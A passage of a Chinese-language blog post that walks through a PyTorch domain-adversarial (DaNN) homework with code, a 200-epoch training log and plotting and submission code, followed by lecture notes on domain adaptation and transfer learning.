    nn.MaxPool2d(2),

    nn.Conv2d(256, 256, 3, 1, 1),
    nn.BatchNorm2d(256),
    nn.ReLU(),
    nn.MaxPool2d(2),

    nn.Conv2d(256, 512, 3, 1, 1),
    nn.BatchNorm2d(512),
    nn.ReLU(),
    nn.MaxPool2d(2)
    )

    def forward(self, x):
    x = self.conv(x).squeeze()
    return x

    class LabelPredictor(nn.Module):

    def __init__(self):
    super(LabelPredictor, self).__init__()

    self.layer = nn.Sequential(
    nn.Linear(512, 512), # 第一和第二层是 512 维输入和 512 维输出的全连接层,分别通过 ReLU 激活;
    nn.ReLU(),

    nn.Linear(512, 512),
    nn.ReLU(),

    nn.Linear(512, 10), # 最后一层是一个全连接层,输出大小为 10,用于分类。
    )

    def forward(self, h):
    c = self.layer(h)
    return c

    class DomainClassifier(nn.Module):

    def __init__(self):
    super(DomainClassifier, self).__init__()

    self.layer = nn.Sequential(
    nn.Linear(512, 512), # 每个隐藏层之后都有批归一化(BatchNorm1d)和 ReLU 激活。
    nn.BatchNorm1d(512),
    nn.ReLU(),

    nn.Linear(512, 512),
    nn.BatchNorm1d(512),
    nn.ReLU(),

    nn.Linear(512, 512),
    nn.BatchNorm1d(512),
    nn.ReLU(),

    nn.Linear(512, 512),
    nn.BatchNorm1d(512),
    nn.ReLU(),

    nn.Linear(512, 1), # 最后一层是一个单神经元输出层(Linear(512, 1)),用于预测域标签。
    )

    def forward(self, h):
    y = self.layer(h)
    return y

    预处理

    ​在这里,我们使用 Adam 作为我们的优化器。

    # 初始化模型并将其移动到 GPU
    feature_extractor = FeatureExtractor().cuda()
    label_predictor = LabelPredictor().cuda()
    domain_classifier = DomainClassifier().cuda()

    # 定义损失函数
    class_criterion = nn.CrossEntropyLoss() # 交叉熵损失函数,用于分类任务。它会在 LabelPredictor 输出的类别概率分布和真实标签之间计算损失。
    domain_criterion = nn.BCEWithLogitsLoss() # 二元交叉熵损失(带 Logits,即自动处理 sigmoid 函数),用于二分类任务。这里用于计算 DomainClassifier 的域分类损失(判断样本属于哪个域),即通过二值标签来判断样本来自哪个数据分布。

    # 每个优化器使用 Adam 优化算法(optim.Adam),适合处理深度学习任务中的大量参数和梯度不稳定的问题。
    optimizer_F = optim.Adam(feature_extractor.parameters())
    optimizer_C = optim.Adam(label_predictor.parameters())
    optimizer_D = optim.Adam(domain_classifier.parameters())

    开始训练

    DaNN 实施

    ​在原始论文中,使用了 Gradient Reversal Layer。 Feature Extractor、Label Predictor 和 Domain Classifier 都同时进行训练。在这段代码中,我们首先训练 Domain Classifier,然后训练我们的 Feature Extractor(与 GAN 中的 Generator 和 Discriminator 训练过程的概念相同)。

    提醒

    • 控制域对抗性损失的 Lambda 在原始论文中是自适应的。您可以参考原著。此处 lambda 设置为 0.1。
    • 我们没有用于目标数据的标签,您只能通过将结果上传到 kaggle 来评估您的模型:)
    def train_epoch(source_dataloader, target_dataloader, lamb):
    '''
    Args:
    source_dataloader: source data 的 dataloader
    target_dataloader: target data 的 dataloader
    lamb: control the balance of domain adaptatoin and classification. 控制域适配与分类之间的平衡
    '''

    # D loss: Domain Classifier 的 loss
    # F loss: Feature Extrator & Label Predictor 的 loss
    # running_D_loss 用于累计域分类器的损失;
    # running_F_loss 用于累计特征提取器和标签分类器的损失;
    running_D_loss, running_F_loss = 0.0, 0.0
    # total_hit 和 total_num 用于计算源域的分类准确率。
    total_hit, total_num = 0.0, 0.0

    for i, ((source_data, source_label), (target_data, _)) in enumerate(zip(source_dataloader, target_dataloader)):
    # 这个循环同时迭代源域和目标域的数据批次。每次迭代中,source_data 和 source_label 为源域的图像和标签,target_data 为目标域的图像。
    source_data = source_data.cuda()
    source_label = source_label.cuda()
    target_data = target_data.cuda()

    # Mixed the source data and target data, or it'll mislead the running params
    # of batch_norm. (runnning mean/var of soucre and target data are different.)
    mixed_data = torch.cat([source_data, target_data], dim=0)
    domain_label = torch.zeros([source_data.shape[0] + target_data.shape[0], 1]).cuda()
    # set domain label of source data to be 1.
    domain_label[:source_data.shape[0]] = 1

    # Step 1 : train domain classifier
    # 第一步:训练域分类器
    # 提取合并数据的特征 feature,feature.detach() 防止梯度反向传播到 feature_extractor。
    feature = feature_extractor(mixed_data)
    # We don't need to train feature extractor in step 1.
    # Thus we detach the feature neuron to avoid backpropgation.
    domain_logits = domain_classifier(feature.detach())
    # 使用域标签 domain_label 和预测的 domain_logits 计算域分类损失 loss。
    loss = domain_criterion(domain_logits, domain_label)
    running_D_loss += loss.item()
    loss.backward()
    optimizer_D.step()

    # Step 2 : train feature extractor and label classifier
    # 第二步:训练特征提取器和标签分类器
    # class_logits 是标签分类器的预测结果,用于源域的分类。
    class_logits = label_predictor(feature[:source_data.shape[0]])
    # domain_logits 用于域分类。
    domain_logits = domain_classifier(feature)
    # loss = cross entropy of classification - lamb * domain binary cross entropy.
    # The reason why using subtraction is similar to generator loss in disciminator of GAN
    # 损失函数包括源域的分类损失 class_criterion(class_logits, source_label) 和域适配损失 domain_criterion(domain_logits, domain_label),两者相减以达到类似对抗训练的效果。
    loss = class_criterion(class_logits, source_label) - lamb * domain_criterion(domain_logits, domain_label)
    running_F_loss += loss.item()
    loss.backward()
    # 更新 feature_extractor 和 label_predictor 的参数。
    # 每次训练批次后清零梯度,并计算源域的分类准确率。
    optimizer_F.step()
    optimizer_C.step()

    optimizer_D.zero_grad()
    optimizer_F.zero_grad()
    optimizer_C.zero_grad()

    total_hit += torch.sum(torch.argmax(class_logits, dim=1) == source_label).item()
    total_num += source_data.shape[0]
    print(i, end='\r')

    return running_D_loss / (i+1), running_F_loss / (i+1), total_hit / total_num

    # train 200 epochs
    # 在 200 个 epoch 中循环,每次 epoch 后保存模型参数并输出训练的损失和准确率。
    for epoch in range(200):

    train_D_loss, train_F_loss, train_acc = train_epoch(source_dataloader, target_dataloader, lamb=0.1)

    torch.save(feature_extractor.state_dict(), f'extractor_model.bin')
    torch.save(label_predictor.state_dict(), f'predictor_model.bin')

    print('epoch {:>3d}: train D loss: {:6.4f}, train F loss: {:6.4f}, acc {:6.4f}'.format(epoch, train_D_loss, train_F_loss, train_acc))
    epoch   0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
    epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
    epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
    epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
    epoch 4: train D loss: 0.5540, train F loss: 1.3243, acc 0.5140
    epoch 5: train D loss: 0.5439, train F loss: 1.2459, acc 0.5480
    epoch 6: train D loss: 0.5538, train F loss: 1.2264, acc 0.5482
    epoch 7: train D loss: 0.5369, train F loss: 1.1544, acc 0.5800
    epoch 8: train D loss: 0.5194, train F loss: 1.1397, acc 0.5838
    epoch 9: train D loss: 0.5368, train F loss: 1.0921, acc 0.5950
    epoch 10: train D loss: 0.5298, train F loss: 1.0657, acc 0.6070
    epoch 11: train D loss: 0.5146, train F loss: 1.0287, acc 0.6186
    epoch 12: train D loss: 0.5331, train F loss: 0.9963, acc 0.6338
    epoch 13: train D loss: 0.5301, train F loss: 0.9842, acc 0.6412
    epoch 14: train D loss: 0.5383, train F loss: 0.9447, acc 0.6488
    epoch 15: train D loss: 0.5252, train F loss: 0.9263, acc 0.6560
    epoch 16: train D loss: 0.5268, train F loss: 0.8820, acc 0.6748
    epoch 17: train D loss: 0.5110, train F loss: 0.8503, acc 0.6848
    epoch 18: train D loss: 0.4955, train F loss: 0.8061, acc 0.7070
    epoch 19: train D loss: 0.5145, train F loss: 0.7806, acc 0.7096
    epoch 20: train D loss: 0.4760, train F loss: 0.7562, acc 0.7194
    epoch 21: train D loss: 0.4721, train F loss: 0.7087, acc 0.7350
    epoch 22: train D loss: 0.4876, train F loss: 0.6906, acc 0.7458
    epoch 23: train D loss: 0.4821, train F loss: 0.6563, acc 0.7580
    epoch 24: train D loss: 0.4547, train F loss: 0.6063, acc 0.7780
    epoch 25: train D loss: 0.4642, train F loss: 0.6035, acc 0.7788
    epoch 26: train D loss: 0.4758, train F loss: 0.5768, acc 0.7826
    epoch 27: train D loss: 0.4539, train F loss: 0.5465, acc 0.7956
    epoch 28: train D loss: 0.4447, train F loss: 0.4864, acc 0.8144
    epoch 29: train D loss: 0.4610, train F loss: 0.5191, acc 0.8064
    epoch 30: train D loss: 0.4341, train F loss: 0.4504, acc 0.8372
    epoch 31: train D loss: 0.4363, train F loss: 0.4291, acc 0.8380
    epoch 32: train D loss: 0.4493, train F loss: 0.4082, acc 0.8508
    epoch 33: train D loss: 0.4308, train F loss: 0.3958, acc 0.8506
    epoch 34: train D loss: 0.4318, train F loss: 0.3513, acc 0.8658
    epoch 35: train D loss: 0.4356, train F loss: 0.3378, acc 0.8708
    epoch 36: train D loss: 0.3975, train F loss: 0.3467, acc 0.8684
    epoch 37: train D loss: 0.4213, train F loss: 0.3099, acc 0.8794
    epoch 38: train D loss: 0.3939, train F loss: 0.2874, acc 0.8900
    epoch 39: train D loss: 0.4279, train F loss: 0.3113, acc 0.8826
    epoch 40: train D loss: 0.4045, train F loss: 0.2726, acc 0.8916
    epoch 41: train D loss: 0.4015, train F loss: 0.2682, acc 0.8974
    epoch 42: train D loss: 0.3976, train F loss: 0.2458, acc 0.9062
    epoch 43: train D loss: 0.4092, train F loss: 0.2502, acc 0.9026
    epoch 44: train D loss: 0.3983, train F loss: 0.2196, acc 0.9120
    epoch 45: train D loss: 0.3920, train F loss: 0.2242, acc 0.9158
    epoch 46: train D loss: 0.4072, train F loss: 0.2050, acc 0.9168
    epoch 47: train D loss: 0.3964, train F loss: 0.1852, acc 0.9272
    epoch 48: train D loss: 0.4001, train F loss: 0.2130, acc 0.9172
    epoch 49: train D loss: 0.3910, train F loss: 0.1914, acc 0.9248
    epoch 50: train D loss: 0.3924, train F loss: 0.1978, acc 0.9228
    epoch 51: train D loss: 0.3916, train F loss: 0.1758, acc 0.9262
    epoch 52: train D loss: 0.3843, train F loss: 0.1651, acc 0.9314
    epoch 53: train D loss: 0.3681, train F loss: 0.1555, acc 0.9352
    epoch 54: train D loss: 0.3960, train F loss: 0.1557, acc 0.9320
    epoch 55: train D loss: 0.3765, train F loss: 0.1543, acc 0.9356
    epoch 56: train D loss: 0.3789, train F loss: 0.1420, acc 0.9406
    epoch 57: train D loss: 0.3878, train F loss: 0.1423, acc 0.9418
    epoch 58: train D loss: 0.3799, train F loss: 0.1477, acc 0.9396
    epoch 59: train D loss: 0.3710, train F loss: 0.1316, acc 0.9450
    epoch 60: train D loss: 0.3815, train F loss: 0.1294, acc 0.9456
    epoch 61: train D loss: 0.3789, train F loss: 0.1300, acc 0.9466
    epoch 62: train D loss: 0.3912, train F loss: 0.1273, acc 0.9472
    epoch 63: train D loss: 0.4002, train F loss: 0.1206, acc 0.9492
    epoch 64: train D loss: 0.3895, train F loss: 0.1332, acc 0.9432
    epoch 65: train D loss: 0.3853, train F loss: 0.1152, acc 0.9518
    epoch 66: train D loss: 0.3878, train F loss: 0.1420, acc 0.9424
    epoch 67: train D loss: 0.3823, train F loss: 0.1158, acc 0.9478
    epoch 68: train D loss: 0.3798, train F loss: 0.1131, acc 0.9514
    epoch 69: train D loss: 0.3736, train F loss: 0.1022, acc 0.9508
    epoch 70: train D loss: 0.3749, train F loss: 0.1215, acc 0.9498
    epoch 71: train D loss: 0.3752, train F loss: 0.0972, acc 0.9572
    epoch 72: train D loss: 0.3745, train F loss: 0.1077, acc 0.9558
    epoch 73: train D loss: 0.3694, train F loss: 0.1041, acc 0.9562
    epoch 74: train D loss: 0.3717, train F loss: 0.0976, acc 0.9534
    epoch 75: train D loss: 0.3718, train F loss: 0.1092, acc 0.9552
    epoch 76: train D loss: 0.3717, train F loss: 0.0744, acc 0.9648
    epoch 77: train D loss: 0.3794, train F loss: 0.0861, acc 0.9590
    epoch 78: train D loss: 0.3652, train F loss: 0.1077, acc 0.9586
    epoch 79: train D loss: 0.3774, train F loss: 0.0617, acc 0.9674
    epoch 80: train D loss: 0.3712, train F loss: 0.0974, acc 0.9582
    epoch 81: train D loss: 0.3725, train F loss: 0.1011, acc 0.9546
    epoch 82: train D loss: 0.3812, train F loss: 0.0931, acc 0.9596
    epoch 83: train D loss: 0.3720, train F loss: 0.0634, acc 0.9668
    epoch 84: train D loss: 0.3752, train F loss: 0.0738, acc 0.9666
    epoch 85: train D loss: 0.3851, train F loss: 0.1143, acc 0.9536
    epoch 86: train D loss: 0.3821, train F loss: 0.0813, acc 0.9618
    epoch 87: train D loss: 0.3911, train F loss: 0.0735, acc 0.9648
    epoch 88: train D loss: 0.3837, train F loss: 0.0832, acc 0.9604
    epoch 89: train D loss: 0.3884, train F loss: 0.0757, acc 0.9624
    epoch 90: train D loss: 0.3728, train F loss: 0.0761, acc 0.9640
    epoch 91: train D loss: 0.3969, train F loss: 0.0718, acc 0.9632
    epoch 92: train D loss: 0.3646, train F loss: 0.0668, acc 0.9632
    epoch 93: train D loss: 0.3808, train F loss: 0.0756, acc 0.9662
    epoch 94: train D loss: 0.3650, train F loss: 0.0818, acc 0.9628
    epoch 95: train D loss: 0.3781, train F loss: 0.0610, acc 0.9682
    epoch 96: train D loss: 0.3837, train F loss: 0.0587, acc 0.9684
    epoch 97: train D loss: 0.3809, train F loss: 0.0591, acc 0.9680
    epoch 98: train D loss: 0.3714, train F loss: 0.0626, acc 0.9670
    epoch 99: train D loss: 0.3909, train F loss: 0.0753, acc 0.9632
    epoch 100: train D loss: 0.3641, train F loss: 0.0607, acc 0.9696
    epoch 101: train D loss: 0.3730, train F loss: 0.0853, acc 0.9612
    epoch 102: train D loss: 0.3746, train F loss: 0.0511, acc 0.9706
    epoch 103: train D loss: 0.3831, train F loss: 0.0493, acc 0.9700
    epoch 104: train D loss: 0.3882, train F loss: 0.0751, acc 0.9622
    epoch 105: train D loss: 0.3777, train F loss: 0.0508, acc 0.9726
    epoch 106: train D loss: 0.3702, train F loss: 0.0462, acc 0.9732
    epoch 107: train D loss: 0.3694, train F loss: 0.0542, acc 0.9734
    epoch 108: train D loss: 0.3700, train F loss: 0.0520, acc 0.9712
    epoch 109: train D loss: 0.3596, train F loss: 0.0439, acc 0.9738
    epoch 110: train D loss: 0.3681, train F loss: 0.0544, acc 0.9688
    epoch 111: train D loss: 0.3840, train F loss: 0.0592, acc 0.9674
    epoch 112: train D loss: 0.3770, train F loss: 0.0624, acc 0.9682
    epoch 113: train D loss: 0.3644, train F loss: 0.0531, acc 0.9720
    epoch 114: train D loss: 0.3787, train F loss: 0.0566, acc 0.9712
    epoch 115: train D loss: 0.3720, train F loss: 0.0429, acc 0.9746
    epoch 116: train D loss: 0.3768, train F loss: 0.0489, acc 0.9732
    epoch 117: train D loss: 0.3765, train F loss: 0.0412, acc 0.9748
    epoch 118: train D loss: 0.3820, train F loss: 0.0450, acc 0.9724
    epoch 119: train D loss: 0.3735, train F loss: 0.0386, acc 0.9768
    epoch 120: train D loss: 0.3774, train F loss: 0.0436, acc 0.9736
    epoch 121: train D loss: 0.3816, train F loss: 0.0491, acc 0.9708
    epoch 122: train D loss: 0.3717, train F loss: 0.0587, acc 0.9686
    epoch 123: train D loss: 0.3802, train F loss: 0.0538, acc 0.9714
    epoch 124: train D loss: 0.3878, train F loss: 0.0432, acc 0.9762
    epoch 125: train D loss: 0.3785, train F loss: 0.0453, acc 0.9746
    epoch 126: train D loss: 0.3749, train F loss: 0.0423, acc 0.9774
    epoch 127: train D loss: 0.3925, train F loss: 0.0328, acc 0.9766
    epoch 128: train D loss: 0.3874, train F loss: 0.0546, acc 0.9682
    epoch 129: train D loss: 0.3843, train F loss: 0.0482, acc 0.9712
    epoch 130: train D loss: 0.3698, train F loss: 0.0500, acc 0.9736
    epoch 131: train D loss: 0.3752, train F loss: 0.0368, acc 0.9762
    epoch 132: train D loss: 0.3818, train F loss: 0.0303, acc 0.9784
    epoch 133: train D loss: 0.3838, train F loss: 0.0490, acc 0.9722
    epoch 134: train D loss: 0.3744, train F loss: 0.0332, acc 0.9792
    epoch 135: train D loss: 0.3743, train F loss: 0.0311, acc 0.9786
    epoch 136: train D loss: 0.3838, train F loss: 0.0419, acc 0.9728
    epoch 137: train D loss: 0.3951, train F loss: 0.0352, acc 0.9760
    epoch 138: train D loss: 0.3878, train F loss: 0.0439, acc 0.9732
    epoch 139: train D loss: 0.3879, train F loss: 0.0419, acc 0.9736
    epoch 140: train D loss: 0.3871, train F loss: 0.0355, acc 0.9758
    epoch 141: train D loss: 0.3819, train F loss: 0.0392, acc 0.9746
    epoch 142: train D loss: 0.3905, train F loss: 0.0578, acc 0.9722
    epoch 143: train D loss: 0.3816, train F loss: 0.0350, acc 0.9758
    epoch 144: train D loss: 0.3899, train F loss: 0.0175, acc 0.9822
    epoch 145: train D loss: 0.4025, train F loss: 0.0469, acc 0.9748
    epoch 146: train D loss: 0.3715, train F loss: 0.0345, acc 0.9748
    epoch 147: train D loss: 0.3841, train F loss: 0.0375, acc 0.9744
    epoch 148: train D loss: 0.3833, train F loss: 0.0310, acc 0.9802
    epoch 149: train D loss: 0.3805, train F loss: 0.0263, acc 0.9764
    epoch 150: train D loss: 0.3763, train F loss: 0.0352, acc 0.9760
    epoch 151: train D loss: 0.3861, train F loss: 0.0330, acc 0.9778
    epoch 152: train D loss: 0.3844, train F loss: 0.0340, acc 0.9764
    epoch 153: train D loss: 0.3902, train F loss: 0.0311, acc 0.9764
    epoch 154: train D loss: 0.3782, train F loss: 0.0387, acc 0.9760
    epoch 155: train D loss: 0.3950, train F loss: 0.0180, acc 0.9808
    epoch 156: train D loss: 0.4017, train F loss: 0.0205, acc 0.9808
    epoch 157: train D loss: 0.3952, train F loss: 0.0484, acc 0.9734
    epoch 158: train D loss: 0.3885, train F loss: 0.0346, acc 0.9776
    epoch 159: train D loss: 0.3916, train F loss: 0.0202, acc 0.9812
    epoch 160: train D loss: 0.3980, train F loss: 0.0306, acc 0.9774
    epoch 161: train D loss: 0.3897, train F loss: 0.0306, acc 0.9800
    epoch 162: train D loss: 0.3909, train F loss: 0.0164, acc 0.9816
    epoch 163: train D loss: 0.3911, train F loss: 0.0273, acc 0.9806
    epoch 164: train D loss: 0.3737, train F loss: 0.0133, acc 0.9830
    epoch 165: train D loss: 0.4064, train F loss: 0.0520, acc 0.9706
    epoch 166: train D loss: 0.3951, train F loss: 0.0242, acc 0.9810
    epoch 167: train D loss: 0.3865, train F loss: 0.0287, acc 0.9810
    epoch 168: train D loss: 0.3921, train F loss: 0.0141, acc 0.9814
    epoch 169: train D loss: 0.3862, train F loss: 0.0130, acc 0.9836
    epoch 170: train D loss: 0.4018, train F loss: 0.0273, acc 0.9764
    epoch 171: train D loss: 0.4053, train F loss: 0.0254, acc 0.9774
    epoch 172: train D loss: 0.4040, train F loss: 0.0169, acc 0.9810
    epoch 173: train D loss: 0.3935, train F loss: 0.0463, acc 0.9734
    epoch 174: train D loss: 0.3991, train F loss: 0.0199, acc 0.9804
    epoch 175: train D loss: 0.3919, train F loss: 0.0275, acc 0.9800
    epoch 176: train D loss: 0.4021, train F loss: 0.0315, acc 0.9780
    epoch 177: train D loss: 0.3856, train F loss: 0.0289, acc 0.9796
    epoch 178: train D loss: 0.3880, train F loss: 0.0171, acc 0.9812
    epoch 179: train D loss: 0.3874, train F loss: 0.0200, acc 0.9824
    epoch 180: train D loss: 0.3974, train F loss: 0.0243, acc 0.9826
    epoch 181: train D loss: 0.3981, train F loss: 0.0191, acc 0.9812
    epoch 182: train D loss: 0.4048, train F loss: 0.0159, acc 0.9822
    epoch 183: train D loss: 0.3929, train F loss: 0.0212, acc 0.9796
    epoch 184: train D loss: 0.3944, train F loss: 0.0130, acc 0.9822
    epoch 185: train D loss: 0.3895, train F loss: 0.0402, acc 0.9752
    epoch 186: train D loss: 0.3849, train F loss: 0.0136, acc 0.9826
    epoch 187: train D loss: 0.3791, train F loss: 0.0222, acc 0.9814
    epoch 188: train D loss: 0.3990, train F loss: 0.0190, acc 0.9812
    epoch 189: train D loss: 0.3964, train F loss: 0.0317, acc 0.9794
    epoch 190: train D loss: 0.3935, train F loss: 0.0385, acc 0.9788
    epoch 191: train D loss: 0.3914, train F loss: 0.0218, acc 0.9812
    epoch 192: train D loss: 0.3764, train F loss: 0.0212, acc 0.9822
    epoch 193: train D loss: 0.3782, train F loss: 0.0193, acc 0.9836
    epoch 194: train D loss: 0.3787, train F loss: 0.0111, acc 0.9832
    epoch 195: train D loss: 0.4000, train F loss: 0.0239, acc 0.9808
    epoch 196: train D loss: 0.3830, train F loss: 0.0201, acc 0.9836
    epoch 197: train D loss: 0.4085, train F loss: 0.0230, acc 0.9802
    epoch 198: train D loss: 0.3908, train F loss: 0.0197, acc 0.9802
    epoch 199: train D loss: 0.3981, train F loss: 0.0170, acc 0.9820

    绘制图表:

    import re
    import matplotlib.pyplot as plt

    # 你的字符串数据
    data = """
    epoch 0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
    epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
    epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
    epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
    ...
    """

    # 使用正则表达式提取数据
    pattern = r"epoch\s+(\d+): train D loss: ([\d.]+), train F loss: ([\d.]+), acc ([\d.]+)"
    matches = re.findall(pattern, data)

    # 转换数据格式
    epochs = []
    d_losses = []
    f_losses = []
    accuracies = []

    for match in matches:
    epoch, d_loss, f_loss, acc = map(float, match)
    epochs.append(int(epoch))
    d_losses.append(d_loss)
    f_losses.append(f_loss)
    accuracies.append(acc)

    # 绘制图表
    plt.figure(figsize=(10, 6))

    # 绘制 D loss 和 F loss
    plt.subplot(2, 1, 1)
    plt.plot(epochs, d_losses, label='D Loss', color='blue')
    plt.plot(epochs, f_losses, label='F Loss', color='orange')
    plt.xlabel('Epoch')
    plt.ylabel('Loss')
    plt.title('Train Losses Over Epochs')
    plt.legend()

    # 绘制 Accuracy
    plt.subplot(2, 1, 2)
    plt.plot(epochs, accuracies, label='Accuracy', color='green')
    plt.xlabel('Epoch')
    plt.ylabel('Accuracy')
    plt.title('Accuracy Over Epochs')
    plt.legend()

    plt.tight_layout()
    plt.show()

    png

    推理

    ​我们使用 pandas 生成 csv 文件。

    ​顺便说一句,训练 200 个 epoch 的模型的性能可能不稳定。您可以训练更多 epoch 以获得更稳定的性能。

    # 初始化和设置模型为评估模式
    result = []
    label_predictor.eval()
    feature_extractor.eval()

    # 循环遍历测试数据并进行预测
    for i, (test_data, _) in enumerate(test_dataloader):
    test_data = test_data.cuda()

    class_logits = label_predictor(feature_extractor(test_data))

    x = torch.argmax(class_logits, dim=1).cpu().detach().numpy()
    result.append(x)

    import pandas as pd
    result = np.concatenate(result)

    # Generate your submission
    # 合并预测结果
    df = pd.DataFrame({'id': np.arange(0,len(result)), 'label': result})
    df.to_csv('DaNN_submission.csv',index=False)

    可视化

    ​我们使用 t-SNE 图来观察提取特征的分布。

    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import manifold
    ]]>
    + Preparation

    【機器學習 2021】概述領域自適應 (Domain Adaptation)

    png

    Domain shift: 训练集和测试集的分布不同,解决方法:Domain adaptation

    迁移学习:ML Lecture 19: Transfer Learning - YouTube

    png

    Domain Shift 分为三种情况:

    • Training Data 和 Testing Data 分布不同,我们将 Training Data 所在域称为 Source Domain,Testing Data 所在域称为 Target Domain(本节课只考虑这个情形)。
    • Training Data 和 Testing Data 标签分布不同。
    • Training Data 和 Testing Data 标签不同。

    png

    Domain Adaption

    如果我们对 target domain 有一定认识:Little but labeled(数量少但正确标注)

    • ldea: training a model by source data then fine-tune the model by target data

      从 source data 里预训练,再在 target data 上 fine-tune

    • Challenge: only limited target data, so becareful about overfitting

      由于 target data 数量小,小心过拟合的问题

    png

    Domain Adaption 的 Basic Idea:设计一个 Feature Extractor 提取 Source Domain 和 Target Domain 的特征,使提取出的特征具有相同分布。

    png

    将网络分成两个部分:Feature Extactor 和 Label Predictor。

    png

    利用类似 GAN 的思路,设计一个 Domain Classifier 对 Feature Extractor 提取出的特征作二分类,目标 $\theta^*d=\min{\theta_d}L_d$。判断提取出的特征属于 Source Domain 还是 Target Domain。

    Label Predictor $\theta^*p=\min{\theta_p}\min L$ 依旧做类别预测。

    Feature Extractor 既要骗过 Domain Classifier,又要提取出有价值的特征。$\theta^*f=\min{\theta_f}L-L_d$

    png

    最早有关 Domain Adversarial Training 的研究:[1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org)

    png

    假设我们当前样本的类别有两类,那么对于有标签的训练集我们可以明显地划分为两类,那么对于没有标签的测试,我们希望它的分布能够和训练集的分布越接近越好,如右图所示

    png

    那么在这个思路上进行拓展的话,对于我们刚才手写识别的例子,我们输入一张图片得到的是一个向量,其中含有属于每一个分类的概率,那我们希望的是这个测试集的样本离分界线越远越好,那就代表它得到的输出向量要更加集中于某一类的概率,不能够各个分类的可能性都差不多

    png

    对于 Knowledge of target domain:

    png

    关于 Domain Generalization 的研究:

    Training 域大,Testing 域小:Domain Generalization with Adversarial Feature Learning | IEEE Conference Publication | IEEE Xplore

    Training 域小,Testing 域大:[1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org)

    ML Lecture 19-Transfer Learning

    png

    关于迁移学习 Transfer Learning,分为两种情况:

    • Similar domain, different tasks 相似域,不同任务
    • Different domains, same task 不同域,相同任务

    png

    迁移学习的应用:Speech Recognition、Image Recognition、Text Analysis

    png

    类比于研究生与漫画家:

    • 研究生 → 漫画家
    • 导师 → 责编
    • 跑实验 → 画分镜
    • 投稿期刊 → 投稿 jump

    png

    对于 Transfer Learning,根据 Source Data (not directly related to the task) 和 Target Data 的情况,共有如下策略:

    Target Data / Source Datalabelledunlabeled
    labelledFine-tuning 微调
    Multitask Learning 多任务学习
    Self-taught learning 自学习
    icml07-selftaughtlearning.pdf (stanford.edu)
    unlabeledDomain-adversarial training 域对抗训练
    Zero-shot learning 零次学习
    Self-taught Clustering 自学聚类算法
    icml.dvi (machinelearning.org)

    png

    Model Fine-tuning

    • Task description

      • Target data: $(xt,yt)$, 数量少
      • Source data: $(xs,ys)$, 数量多
    • Example: (supervised) speaker adaption

      示例:(监督)speaker 自适应

      • Target data: audio data and its transcriptions of specificuser

        目标数据:特定用户的音频数据及其转录

      • Source data: audio data and transcriptions from many speakers

        来源数据:来自许多 speaker 的音频数据和转录

    • ldea: training a model by source data, then fine-tune the model by target data

      ldea:根据源数据训练模型,然后根据目标数据微调模型

      • Challenge: only limited target data, so be careful about overfitting

        挑战:只有有限的目标数据,所以要小心过度拟合

    png

    Conservative Training:

    • 我们先通过 Source data 去 train 一个 model
    • 然后通过并不是直接把这个 model 当做 pre-trained 的 model,去用少量的 target data 去训练一个新的 model
    • 而是加入一些正则化项,来保证新的 model 和旧的 model 在 input 相同的情况下,得到的 output 尽可能的相近。
    • 为什么要这样做呢?其实原因很简单,如果我们在 train 新的 model 的过程中,并不去加这个正则项(也叫限制项),那么如果我们将 source data 送进新的 model,我们会发现整个 model 彻底坏掉了,他已经不具备原先 model 对于 source data 的表现能力了,这也是在 ML 中经常出现的一个非常重要的问题:灾难性遗忘问题

    png

    Layer Transfer

    • 首先还是和 Conservative Training 一样,通过 Source data 去 train 一个 model
    • 然后将该 model 中某些层的 parameters 直接复制进去新的 model 中
    • 对于新 model 中那些没有得到 parameters 的 layer,我们固定其他层的参数,通过 Source data 对那些没有被 transfer 到 parameter 的 layer 进行训练
    • 最后,如果 target data 的数据量比较充足,那么我们就可以在对整个网络进行 fine-tuning 一下,可以进一步提升模型的性能。

    png

    • 对于 Speech 任务,通常 copy 最后几层

    • 对于 Image 任务,通常 copy 头几层

    png

    关于 Layer Transfer 的研究:

    png

    png

    Multitask Learning

    • 再来回顾下 fine-tuning 的过程,在做 fine-tuning 的时候,我们更加关注的是 model 在 target domain 上做的好不好,至于在 source domain 上做的到底怎么样,哪怕是将 source data 输入进这个新的 model 中,model 都坏掉了,也不要紧。只要这个新的 model 在 target domain 上做的很出色就够了。
    • 而 multitask learning 和 fine-tuning 的过程就不同了,multitask 是说,不仅要求我们的最终 model 在 target domain 上表现的相当出色,而且在 source domain 上同样也要表现的相当出色。

    png

    Multitask Learning 在多语言机器翻译上的研究:Multi-Task Learning for Multiple Language Translation (aclanthology.org)

    png

    png

    Progressive Neural Networks

    • 这篇网络中的方法还是比较新的,首先对于 task 1 来说,我们 train 出一个 model
    • 然后将 task 1 中的第 i 层的输出直接输入进 task 2 中的第 i 层的输出,作为第 i + 1 层的输入。
    • 然后后面如果有 k 个网络,就会应用到前 k-1 个网络的信息。

    png

    对于 Source data 和 Target data 处于不同域:mismatch 时

    png

    Domain-adversarial training: 设计一个 Domain classifier,迫使 feature extractor 提取出相同分布的特征。

    png

    Domain-adversarial training

    • 第一部分绿色的 feature extractor 其实要做的就是提取出 source data 和 target data 的 feature,然后使得最后在做 classification 的时候,通过这些提取出来的 feature,能够得到一个非常好的精确度。他还有尽可能让这些 mismatch 的 data 混在一起,以至于 domain classifier 不能够正确的判断他们是否混在一起。
    • 第二部分蓝色的 label predictor 做的是,能够尽可能大的输出 classification 的精度
    • 第三部分红色的 domain classifier 做的是,能够尽可能的将从 feature extractor 中提取出来的 feature 进行分开,将其各自归属到其所属的 domain 里。

    当然,关于这个网络的 train,讲起来很容易,实际操作起来,肯定会像 GAN 一样,涉及到很多的 trick。

    png

    png

    png

    Zero-shot Learning: Source data 和 Target data 是不同的 tasks.

    png

    png

    png

    在 NLP 领域中比较常见,可以用 word embedding

    png

    png

    png

    有关 Zero-shot Learning 的实验:[1312.5650v3] Zero-Shot Learning by Convex Combination of Semantic Embeddings (arxiv.org)

    png

    png

    png

